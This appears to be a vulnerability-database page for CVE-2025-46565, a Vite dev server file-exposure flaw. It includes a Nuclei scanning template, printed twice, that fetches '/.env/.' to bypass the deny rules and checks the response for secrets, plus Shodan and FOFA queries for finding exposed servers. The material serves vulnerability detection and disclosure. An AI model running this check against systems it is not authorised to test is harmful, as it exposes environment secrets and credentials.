Vite Dev Server - Information Exposure

CVE-2025-46565

Verified

Description

Vite is a frontend tooling framework for JavaScript. Before versions 6.3.4, 6.2.7, 6.1.6, 5.4.19, and 4.5.14, the contents of files in the project root that are denied by a file matching pattern can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected. Only files that are under project root and are denied by a file matching pattern can be bypassed. `server.fs.deny` can contain patterns matching against files (by default it includes .env, .env.*, *.{crt,pem} as such patterns). These patterns were able to bypass for files under `root` by using a combination of slash and dot (/.). This issue has been patched in versions 6.3.4, 6.2.7, 6.1.6, 5.4.19, and 4.5.14.

Severity

Medium

CVSS Score

5.3

Exploit Probability

Published Date

March 26, 2026

Template Author

ritikchaddha

CVE-2025-46565.yaml

id: CVE-2025-46565

info:
  name: Vite Dev Server - Information Exposure
  author: ritikchaddha
  severity: medium
  description: |
    Vite is a frontend tooling framework for JavaScript. Before versions 6.3.4, 6.2.7, 6.1.6, 5.4.19, and 4.5.14, the contents of files in the project root that are denied by a file matching pattern can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected. Only files that are under project root and are denied by a file matching pattern can be bypassed. `server.fs.deny` can contain patterns matching against files (by default it includes .env, .env.*, *.{crt,pem} as such patterns). These patterns were able to bypass for files under `root` by using a combination of slash and dot (/.). This issue has been patched in versions 6.3.4, 6.2.7, 6.1.6, 5.4.19, and 4.5.14.
  reference:
    - https://github.com/vitejs/vite/security/advisories/GHSA-859w-5945-r5v3
    - https://nvd.nist.gov/vuln/detail/CVE-2025-46565
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-46565
    epss-score: 0.01436
    epss-percentile: 0.80931
    cwe-id: CWE-22
  metadata:
    max-request: 2
    fofa-query: body="/@vite/client"
    shodan-query: http.html:"/@vite/client"
  tags: cve,cve2025,vite,exposure,bypass

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/.env"

    matchers:
      - type: status
        status:
          - 403
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/.env/."

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "VITE_APP_SECRET"
        case-insensitive: true

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204f890e0c0756e1018ab77854f7c1675aa07faa9a6b4202afeb9a9aafc5f5c614022100f04272abce2abe60e57287133e10f722a4ccf1857536c4562471780a01020d50:922c64590222798bb761d5b6d8e72950

5.3Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE ID:

cve-2025-46565

CWE ID:

cwe-22

References

https://github.com/vitejs/vite/security/advisories/GHSA-859w-5945-r5v3 https://nvd.nist.gov/vuln/detail/CVE-2025-46565

Description

id: CVE-2025-46565

info:
  name: Vite Dev Server - Information Exposure
  author: ritikchaddha
  severity: medium
  description: |
    Vite is a frontend tooling framework for JavaScript. Before versions 6.3.4, 6.2.7, 6.1.6, 5.4.19, and 4.5.14, the contents of files in the project root that are denied by a file matching pattern can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected. Only files that are under project root and are denied by a file matching pattern can be bypassed. `server.fs.deny` can contain patterns matching against files (by default it includes .env, .env.*, *.{crt,pem} as such patterns). These patterns were able to bypass for files under `root` by using a combination of slash and dot (/.). This issue has been patched in versions 6.3.4, 6.2.7, 6.1.6, 5.4.19, and 4.5.14.
  reference:
    - https://github.com/vitejs/vite/security/advisories/GHSA-859w-5945-r5v3
    - https://nvd.nist.gov/vuln/detail/CVE-2025-46565
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-46565
    epss-score: 0.01436
    epss-percentile: 0.80931
    cwe-id: CWE-22
  metadata:
    max-request: 2
    fofa-query: body="/@vite/client"
    shodan-query: http.html:"/@vite/client"
  tags: cve,cve2025,vite,exposure,bypass

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/.env"

    matchers:
      - type: status
        status:
          - 403
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/.env/."

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "VITE_APP_SECRET"
        case-insensitive: true

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204f890e0c0756e1018ab77854f7c1675aa07faa9a6b4202afeb9a9aafc5f5c614022100f04272abce2abe60e57287133e10f722a4ccf1857536c4562471780a01020d50:922c64590222798bb761d5b6d8e72950

Vite Dev Server - Information Exposure

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Vite Dev Server - Information Exposure

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References